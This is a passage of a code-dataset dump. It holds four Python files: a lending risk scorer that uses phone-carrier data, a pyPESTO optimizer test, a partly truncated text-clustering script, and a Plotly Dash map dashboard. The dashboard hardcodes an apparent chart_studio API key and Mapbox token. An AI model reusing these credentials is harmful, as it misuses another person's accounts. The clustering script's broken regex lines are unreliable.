'msg_record_view')\n\n        res['msgDetail'] = res['msgDetail'][start: end]\n\n        return res\n\n    def credit_risk_calculate(self, data=None, online_data=None, now=None, source='mashang'):\n        \"\"\" Pre-loan risk assessment: loss-of-contact risk \"\"\"\n\n        assess = {\n            RiskEvaluation.O: 0,\n            RiskEvaluation.N: 0,\n            RiskEvaluation.S: 0,\n            RiskEvaluation.M: 0,\n            RiskEvaluation.L: 0,\n            RiskEvaluation.XL: 0,\n        }\n        ret_lis = []\n\n        if data is None:\n            data = self.data\n        if not data:\n            assess[RiskEvaluation.N] += 1\n            ret_lis.append('未进行运营商授权,无法判断')\n            return {\n                'assess': assess,\n                'result': ret_lis,\n            }\n        result = {\n            1: 0, # low\n            2: 0,\n            3: 0,\n            4: 0}\n        # how long the phone number has been in service\n        phone_register_t = data.get(\"phoneInfo\", {}).get(\"inNetDate\", \"6月\")\n        has_time = data.get(\"phoneInfo\", {}).get(\"netAge\", \"6月\")\n        # has_time = data.get(\"\")\n\n        ###############################################\n        # Legacy version that derived time-in-service from carrier data; no longer used\n        ###############################################\n        # def long_time_handler(m):\n        #     d = m\n        #     all_nums_char = [str(i) for i in range(0, 11)]\n        #     other_char = set()\n\n        #     for i in d:\n        #         if i not in all_nums_char:\n        #             other_char.add(i)\n        #     for i in other_char:\n        #         d = d.replace(i, ';')\n        #     d = d.split(';')\n        #     d = list(filter(lambda x: x, d))\n        #     if len(d) == 0:\n        #         return True\n        #     
elif len(d) == 1:\n        #         if '月' in m and int(d[0]) > 3:\n        #             return True\n        #         if '年' in m and int(d[0]) > 0:\n        #             return True\n        #         return False\n        #     elif len(d) >= 2:\n        #         if int(d[0]) > 0 or int(d[1]) >= 3:\n        #             return True\n        #         return False\n\n        ################################\n        # Version that parses the dedicated time-in-service lookup API\n        ################################\n        def long_time_handler_mashang(m):\n\n            from app.credit.pipeline import mashang_online\n\n            # if the time-in-service lookup was never made, default to low risk\n            if not online_data:\n                return True\n            parsed_online_data = mashang_online(online_data)['timeRange']\n            p1 = re.compile('(\\d+)-(\\d+)个月')\n            p2 = re.compile('(\\d+)个月以上')\n            r1 = p1.match(parsed_online_data)\n            r2 = p2.match(parsed_online_data)\n            if r1:\n                online_int = int(r1.groups()[1])\n            elif r2:\n                online_int = int(r2.groups()[0])\n            else:\n                online_int = 1000\n\n            if online_int < 3:\n                return False\n\n            return True\n\n        ################################\n        # Version that parses the Zhongchengxin time-in-service lookup\n        ################################\n        def long_time_handler_zhongchengxin(m):\n\n            from app.credit.pipeline import handle_operator_phonetime\n\n            # if the time-in-service lookup was never made, default to low risk\n            if not online_data:\n                return True\n            parsed_online_data = handle_operator_phonetime(online_data)['timeRange']\n            p1 = re.compile('(\\d+)-(\\d+)个月')\n            p2 = re.compile('(\\d+)个月以上')\n            r1 = p1.match(parsed_online_data)\n            r2 = p2.match(parsed_online_data)\n            if r1:\n                online_int = int(r1.groups()[1])\n            elif r2:\n                online_int = int(r2.groups()[0])\n            else:\n                online_int = 1000\n\n            if online_int < 3:\n                return False\n\n            return True\n\n        if source == 'mashang':\n            if long_time_handler_mashang(has_time) is False:\n                assess[RiskEvaluation.M] += 1\n                ret_lis.append('手机号使用时间低于正常值范围')\n                result[2] += 1\n        elif source == 'zhongchengxin':\n            if long_time_handler_zhongchengxin(has_time) is False:\n                assess[RiskEvaluation.M] += 1\n                ret_lis.append('手机号使用时间低于正常值范围')\n                result[2] += 1\n\n        today_t = datetime.datetime.now()\n        today_str = '%d%02d%02d' % (today_t.year, today_t.month, today_t.day)\n        if phone_register_t == today_str:\n            assess[RiskEvaluation.L] += 1\n            ret_lis.append('手机号为申请日当天注册,借款人失联风险高')\n            result[4] += 1\n        # number of contacts\n        obj = self.contract_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), True)\n\n        if (obj.get(\"result\", 0) or 0) < 10:\n            assess[RiskEvaluation.M] += 1\n            ret_lis.append('近6个月联系人数量{}人,低于正常值范围'.format(obj.get(\"result\", 0)))\n            result[2] += 1\n\n        obj = self.contact_phone_num(data.get('deceitRisk', {}).get(\"monthCallInfo\", {}), True)\n\n        if (obj.get(\"result\", 0) or 0) <= 5:\n            assess[RiskEvaluation.M] += 1\n            ret_lis.append(\"近6个月互通电话数量{}个,低于正常值范围\".format(obj.get(\"result\", 0)))\n            result[2] += 1\n\n        obj = self.long_time_slicense(data.get('deceitRisk', {}).get(\"silenceInfo\", []), False, now)\n        max_result = obj.get('max_result', 0) or 0\n\n        if 10 < max_result < 30:\n            assess[RiskEvaluation.M] += 1\n            ret_lis.append(\"手机号连续静默时间{}天,超过正常值范围\".format(max_result))\n            result[2] += 1\n        elif max_result >= 30:\n            assess[RiskEvaluation.L] += 1\n            ret_lis.append(\"手机号连续静默时间{}天,静默时间过长,借款人失联风险高\".format(max_result))\n            result[4] += 1\n\n        level = 1\n        li_ = list(range(1, 4))\n        li_.reverse()\n        for i in li_:\n            if result[i] > 0:\n                level = i\n                break\n\n        return {\n            'assess': assess,\n            'result': ret_lis,\n        }\n\n\nif __name__ == '__main__':\n\n    data = None\n    with open(\"data.json\", 'r') as fp:\n        data = fp.read()\n    import json\n    data = json.loads(data)\n    d = UserExceptionAction(data.get('data'))\n    ret = d.credit_risk_calculate(data.get('data'))\n\n", "repo_name": "leolinf/flask-demo", "sub_path": "risk/app/capcha_report/util.py", "file_name": "util.py", "file_ext": "py", 
"file_size_in_byte": 50076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.localtime", "line_number": 36, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "attribute"}, {"api_name": "operator.itemgetter", "line_number": 85, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 325, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 325, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 330, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 330, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 332, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 332, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 336, "usage_type": "attribute"}, {"api_name": "functools.partial", "line_number": 411, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 519, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 519, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 570, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 570, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 622, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 622, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 795, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 808, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 808, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 810, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 810, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 822, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 849, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 849, "usage_type": "attribute"}, {"api_name": "app.core.functions.save_to_cache", "line_number": 1172, "usage_type": "call"}, {"api_name": "app.core.functions.save_to_cache", "line_number": 1226, "usage_type": "call"}, {"api_name": "constants.RiskEvaluation.O", "line_number": 1236, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1236, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.N", "line_number": 1237, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1237, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.S", "line_number": 1238, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1238, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1239, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", 
"line_number": 1239, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1240, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1240, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.XL", "line_number": 1241, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1241, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.N", "line_number": 1248, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1248, "usage_type": "name"}, {"api_name": "app.credit.pipeline.mashang_online", "line_number": 1298, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1303, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1304, "usage_type": "call"}, {"api_name": "app.credit.pipeline.handle_operator_phonetime", "line_number": 1325, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1330, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 1331, "usage_type": "call"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1348, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1348, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1353, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1353, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1357, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1357, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1360, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1360, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1367, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1367, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1374, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1374, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.M", "line_number": 1382, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1382, "usage_type": "name"}, {"api_name": "constants.RiskEvaluation.L", "line_number": 1386, "usage_type": "attribute"}, {"api_name": "constants.RiskEvaluation", "line_number": 1386, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 1410, "usage_type": "call"}, {"api_name": "{'traceback': 'traceback', 'json': 'json', 'reduce': 'functools.reduce', 'mashang_online': 'app.credit.pipeline.mashang_online', 'handle_operator_phonetime': 'app.credit.pipeline.handle_operator_phonetime'}", "line_number": 1411, "usage_type": "call"}]}
+{"seq_id": "1344116375", "text": "\"\"\"\nThis is for testing optimization of the pypesto.Objective.\n\"\"\"\n\n\nimport numpy as np\nimport pypesto\nimport pytest\nimport test.test_objective as test_objective\nimport warnings\nimport re\n\n\n@pytest.fixture(params=['separated', 'integrated'])\ndef mode(request):\n return request.param\n\n\noptimizers = [\n *[('scipy', method) for method in [\n 'Nelder-Mead', 'Powell', 'CG', 'BFGS', 'Newton-CG',\n 'L-BFGS-B', 'TNC', 'COBYLA', 'SLSQP',\n 'trust-ncg', 'trust-exact', 'trust-krylov',\n 'ls_trf', 'ls_dogbox']],\n # disabled: ,'trust-constr', 'ls_lm', 'dogleg'\n ('dlib', 'default'),\n ('pyswarm', ''),\n]\n\n\n@pytest.fixture(params=optimizers)\ndef optimizer(request):\n return request.param\n\n\ndef test_optimization(mode, optimizer):\n \"\"\"Test optimization using various optimizers and objective modes.\"\"\"\n if mode == 'separated':\n obj = test_objective.rosen_for_sensi(max_sensi_order=2,\n integrated=False)['obj']\n else: # mode == 'integrated':\n obj = test_objective.rosen_for_sensi(max_sensi_order=2,\n integrated=True)['obj']\n\n library, method = optimizer\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n if re.match(r'^(?i)(ls_)', method):\n # obj has no residuals\n with pytest.raises(Exception):\n check_minimize(obj, library, method)\n # no error when allow failed starts\n check_minimize(obj, library, method, allow_failed_starts=True)\n else:\n check_minimize(obj, library, method)\n\n\ndef check_minimize(objective, library, solver, allow_failed_starts=False):\n\n options = {\n 'maxiter': 100\n }\n\n optimizer = None\n\n if library == 'scipy':\n optimizer = pypesto.ScipyOptimizer(method=solver,\n options=options)\n elif library == 'dlib':\n optimizer = pypesto.DlibOptimizer(method=solver,\n options=options)\n elif library == 'pyswarm':\n optimizer = pypesto.PyswarmOptimizer(options=options)\n\n lb = 0 * np.ones((1, 2))\n ub = 1 * np.ones((1, 2))\n problem = pypesto.Problem(objective, lb, ub)\n\n optimize_options = pypesto.OptimizeOptions(\n allow_failed_starts=allow_failed_starts)\n\n result = pypesto.minimize(\n problem=problem,\n optimizer=optimizer,\n n_starts=1,\n startpoint_method=pypesto.startpoint.uniform,\n options=optimize_options\n )\n\n assert isinstance(result.optimize_result.list[0]['fval'], float)\n", "repo_name": "martamatos/pyPESTO", "sub_path": "test/test_optimize.py", "file_name": "test_optimize.py", "file_ext": "py", "file_size_in_byte": 2639, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 31, "usage_type": "call"}, {"api_name": "test.test_objective.rosen_for_sensi", "line_number": 39, "usage_type": "call"}, {"api_name": "test.test_objective", "line_number": 39, "usage_type": "name"}, {"api_name": "test.test_objective.rosen_for_sensi", "line_number": 42, "usage_type": "call"}, {"api_name": "test.test_objective", "line_number": 42, "usage_type": "name"}, {"api_name": "warnings.catch_warnings", "line_number": 47, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 48, "usage_type": "call"}, {"api_name": "re.match", "line_number": 49, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 51, "usage_type": "call"}, {"api_name": "pypesto.ScipyOptimizer", "line_number": 68, "usage_type": "call"}, {"api_name": "pypesto.DlibOptimizer", "line_number": 71, "usage_type": "call"}, 
{"api_name": "pypesto.PyswarmOptimizer", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 77, "usage_type": "call"}, {"api_name": "pypesto.Problem", "line_number": 78, "usage_type": "call"}, {"api_name": "pypesto.OptimizeOptions", "line_number": 80, "usage_type": "call"}, {"api_name": "pypesto.minimize", "line_number": 83, "usage_type": "call"}, {"api_name": "pypesto.startpoint", "line_number": 87, "usage_type": "attribute"}]}
+{"seq_id": "34595580288", "text": "'jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul', 'aug', 'sep', 'oct', 'nov', 'dec'\n'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'\n\n\n\nimport pandas as pd\nimport re\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n\nMIN_WORDS = 3\nMAX_WORDS = 30\nSTOPWORDS = set(stopwords.words('english'))\n\ndef clean_text(text):\n \"\"\"\n Series of cleaning. String to lower case, remove non words characters and numbers.\n text (str): input text\n return (str): modified initial text\n \"\"\"\n PATTERN_S = re.compile(\"\\'s\") # matches `'s` from text`\n PATTERN_RN = re.compile(\"\\\\r\\\\n\") #matches `\\r` and `\\n`\n PATTERN_PUNC = re.compile(r\"[^\\w\\s]\") # matches all non 0-9 A-z whitespace\n PATTERN_1 = re.compile(r\"\\b(? min_words and len(w) < max_words)]\n # remove new stopwords from the token list\n tokens = [w for w in tokens if w not in stopwords]\n return tokens\n\ndef clean_sentences(df, output_file):\n \"\"\"\n Remove irrelevant characters (in new column clean_sentence).\n Lemmatize, tokenize words into list of words (in new column tok_lem_sentence).\n Save DataFrame to CSV file with additional column.\n \"\"\"\n print('Cleaning sentences...')\n df['clean_sentence'] = df['Document_Description'].apply(clean_text)\n df['tok_lem_sentence'] = df['clean_sentence'].apply(\n lambda x: tokenizer(x, min_words=MIN_WORDS, max_words=MAX_WORDS, stopwords=STOPWORDS, lemmatize=True))\n df.to_csv(output_file, index=False)\n return df\n\n\n\ndf['Document_Description'] = df['Document_Description'].astype(str)\n\n\nfrom sklearn.model_selection import GridSearchCV\n\n# Define a set of hyperparameters and their corresponding values to search over\nparam_grid = {\n 'n_clusters': [3, 5, 7, 9],\n 'max_iter': [50, 100, 200, 500],\n 'tol': [0.0001, 0.001, 0.01, 0.1],\n 'random_state': [42]\n}\n\n# Create a K-Means model\nkmeans = KMeans()\n\n# Perform Grid Search to find the best hyperparameters\ngrid_search = GridSearchCV(kmeans, param_grid=param_grid, cv=5, n_jobs=-1)\ngrid_search.fit(vectorized_docs)\n\n# Print the best hyperparameters and the corresponding performance score\nprint(\"Best hyperparameters:\", grid_search.best_params_)\nprint(\"Best score:\", grid_search.best_score_)\n\n\n\ninertia_scores = []\nsilhouette_scores = []\ndb_scores = []\nfor k in range(2, 21):\n kmeans = KMeans(n_clusters=k, max_iter=50)\n cluster_labels = kmeans.fit_predict(vectorized_docs)\n inertia_scores.append(kmeans.inertia_)\n silhouette_scores.append(silhouette_score(vectorized_docs, cluster_labels))\n db_scores.append(davies_bouldin_score(vectorized_docs.toarray(), cluster_labels))\n\n# Plot the elbow curve\nimport matplotlib.pyplot as plt\nplt.plot(range(2, 21), inertia_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Inertia')\nplt.show()\n\n# Plot silhouette scores\nplt.plot(range(2, 21), silhouette_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Silhouette Score')\nplt.show()\n\n# Plot Davies-Bouldin index\nplt.plot(range(2, 21), db_scores)\nplt.xlabel('Number of Clusters')\nplt.ylabel('Davies-Bouldin Index')\nplt.show()\n\n\n\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom scipy.stats import randint\nfrom sklearn.cluster import KMeans\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\n# Load and preprocess Confluence documentation pages\nconfluence_docs = 
pd.read_csv('confluence_docs.csv')\npreprocessed_docs = preprocess_text(confluence_docs['text'])\n\n# Convert preprocessed text to numerical vectors using TF-IDF\nvectorizer = TfidfVectorizer()\nvectorized_docs = vectorizer.fit_transform(preprocessed_docs)\n\n# Define a set of hyperparameters and their corresponding values to search over\nparam_dist = {\n 'n_clusters': randint(3, 21),\n 'max_iter': randint(50, 500),\n 'tol': [0.0001, 0.001, 0.01, 0.1],\n 'random_state': [42]\n}\n\n# Create a K-Means model\nkmeans = KMeans()\n\n# Perform Randomized Search to find the best hyperparameters\nrandom_search = RandomizedSearchCV(kmeans, param_distributions=param_dist, cv=5, n_jobs=-1, n_iter=20)\nrandom_search.fit(vectorized_docs)\n\n# Print the best hyperparameters and the corresponding performance score\nprint(\"Best hyperparameters:\", random_search.best_params_)\nprint(\"Best score:\", random_search.best_score_)\n\n\n\n", "repo_name": "codepradosh/Movie-Recommendation-system", "sub_path": "stopwords.py", "file_name": "stopwords.py", "file_ext": "py", "file_size_in_byte": 5297, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 14, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 14, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 30, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 35, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 44, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 45, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 47, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 50, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 138, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 144, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 153, "usage_type": "call"}]}
+{"seq_id": "20718365134", "text": "import chart_studio\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nfrom dash import callback_context\nimport dash_daq as daq\n\nchart_studio.tools.set_credentials_file(username='griffin123', api_key='XLkOUTSmAhXbMImJGRd2')\nmapbox_access_token = 'pk.eyJ1IjoiZ3JpZmZpbjEyMyIsImEiOiJjazV2YnFndHIwYmliM2ptZGNiMGpxbDE1In0._iZvbdWb--5eNSF7Q3sI9g'\n\nn = 100 # every 100th line = 1% of the lines\n# df = pd.read_csv(filename, header=0, skiprows=lambda i: i % n != 0)\nbuildings = pd.read_csv(\"../sample2.csv\",on_bad_lines='skip')\nDATE = \"GWAERDATH1\"\nbuildings[DATE] = buildings[DATE].fillna(method=\"bfill\")\nbuildings = buildings.fillna(0)\nbuildings['YEAR'] = [str(str(i)[:4]) for i in list(buildings[DATE])]\nyears = list(buildings['YEAR'].unique())\ncolors = [\"#7FB290\", \"#83DBEE\", \"#D67445\",\"#90f5d3\",\"#dd90f5\",\"#fc425e\", \"#faf06b\", \"#629bfc\", \"#3C799D\", \"green\", \"brown\", \"yellow\"]\nnames = [\"Product \" + str(int(i+1)) for i in range(10)]\n\nmapping = {list(buildings['GKSCE'].unique())[i]:colors[i] for i in range(len(list(buildings['GKSCE'].unique())))}\nmapping2= {list(buildings['GKSCE'].unique())[i]:names[i] for i in range(len(list(buildings['GKSCE'].unique())))}\nbuildings['PRODUCT'] = [mapping2[elt] for elt in list(buildings['GKSCE'])]\n\nfig3 = go.Figure()\npie = go.Figure()\nfig4 = go.Figure()\nmu=0\nsigma=20\niyrs = range(2000, 2022, 1)\nprint(iyrs)\nxs1 = []\nys1 = []\n\nfor elt in list(buildings['GDEKT'].unique()):\n\n xs = []\n ys = []\n\n for yr in iyrs:\n if int(yr) > 2003:\n tmp = buildings[(buildings['GDEKT'] == elt) & (buildings['YEAR'] == str(yr))]\n ys.append(sum(list(tmp['GANZWHG'])))\n xs.append(int(yr))\n\n else:\n continue\n fig4.add_trace(\n go.Scatter(\n y=ys,\n x=xs,\n name=elt,\n marker={\n # \"color\":colors[e],\n }\n )\n )\ne = -1\n\ntxs = []\ntys = []\n\nfor elt in list(buildings['PRODUCT'].unique()):\n e += 1\n xs = []\n ys = []\n tmp1 = buildings[buildings['PRODUCT'] == elt]\n tys.append(elt)\n txs.append(sum(list(tmp1['GANZWHG'])))\n for yr in years:\n if int(yr) > 2003:\n tmp = buildings[(buildings['PRODUCT'] == elt) & (buildings['YEAR'] == yr)]\n xs.append(sum(list(tmp['GANZWHG'])))\n ys.append(int(yr))\n\n else:\n continue\n fig3.add_trace(\n go.Bar(\n y=ys,\n x=xs,\n name=elt,\n orientation=\"h\",\n marker={\n \"color\":colors[e],\n }\n )\n )\nfig3.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n margin=dict(l=0, r=0, t=35, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Number of Yearly Sales\",\n font_size=16,\n height=300\n)\nfig4.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n margin=dict(l=0, r=0, t=50, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Yearly Sales by Canton\",\n font_size=16,\n height=300\n)\npie.add_trace(\n go.Pie(\n labels=tys,\n values=txs,\n name=\"Total Distribution of Sales\",\n marker_colors=colors\n )\n)\npie.update_layout(\n plot_bgcolor=\"rgba(0,0,0,0)\",\n paper_bgcolor=\"rgba(0,0,0,0)\",\n showlegend=False,\n margin=dict(l=0, r=0, t=35, b=0),\n font_family=\"Paytone One\",\n font_color=\"#3C799D\",\n title=\"Distribution of Yearly Sales\",\n font_size=16,\n height=300\n)\nfig3.update_layout(barmode='stack')\n\nfig = 
go.Figure()\n\nfig.add_trace(\n go.Scattermapbox(\n lat = buildings['long'],\n lon = buildings['lat'],\n mode=\"markers\",\n text=[mapping2[elt] for elt in list(buildings['GKSCE'])],\n marker=go.scattermapbox.Marker(\n size=[max(x*2, 5) for x in list(buildings['GANZWHG'])],\n color=[mapping[elt] for elt in list(buildings['GKSCE'])],\n\n )\n )\n)\n\nfig.update_layout(\n hovermode='closest',\n mapbox=go.layout.Mapbox(\n accesstoken=mapbox_access_token,\n bearing=0,\n style=\"mapbox://styles/griffin123/clesip64o00jn01lk5bl0fqku\",\n center=go.layout.mapbox.Center(\n lat=46.849110,\n lon=8.392482\n ),\n pitch=0,\n zoom=7.8,\n ),\n plot_bgcolor=\"rgba(0,0,0,0)\", paper_bgcolor=\"rgba(0,0,0,0)\"\n)\n#\n# fig2 = go.Figure()\n\nfig.update_layout(\n margin=dict(l=0, r=0, t=0, b=0),\n)\n\napp = dash.Dash(\n external_stylesheets=[\n dbc.themes.CYBORG,\n dbc.icons.FONT_AWESOME,\n 'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css',\n \"https://fonts.googleapis.com/css2?family=Paytone+One&display=swap\"\n ]\n )\n\npcard = dbc.Card(\n [\n dbc.Row(\n [\n dbc.Col(\n dbc.CardImg(\n src=\"/assets/mugshot-modified.png\",\n className=\"img-fluid rounded-start\",\n ),\n className=\"col-md-4\",\n style={\"margin-left\":\"1vw\",\"height\":\"4vh\",\"width\":\"4vw\"}\n ),\n dbc.Col(\n dbc.CardBody(\n [\n html.H5(\"Welcome, GW\", className=\"card-title\",style={\"color\":\"white\"}),\n html.P(\n \"This is a sample dashboard using static data. It can be easily modified to fit your use case!\",\n className=\"card-text\",\n style={\n \"font-size\":\"14px\"\n }\n ),\n html.Small(\n \"Last login 3 mins ago\",\n className=\"card-text text-muted\",\n ),\n ]\n ),\n className=\"col-md-8\",\n ),\n ],\n className=\"g-0 d-flex align-items-center\",\n )\n ],\n className=\"mb-3\",\n style={\n \"maxWidth\": \"540px\",\n \"margin-right\":\"1vw\",\n \"margin-left\":\"1vw\",\n \"margin-top\":\"6vh\",\n \"background-color\":\"#2B323D\",\n 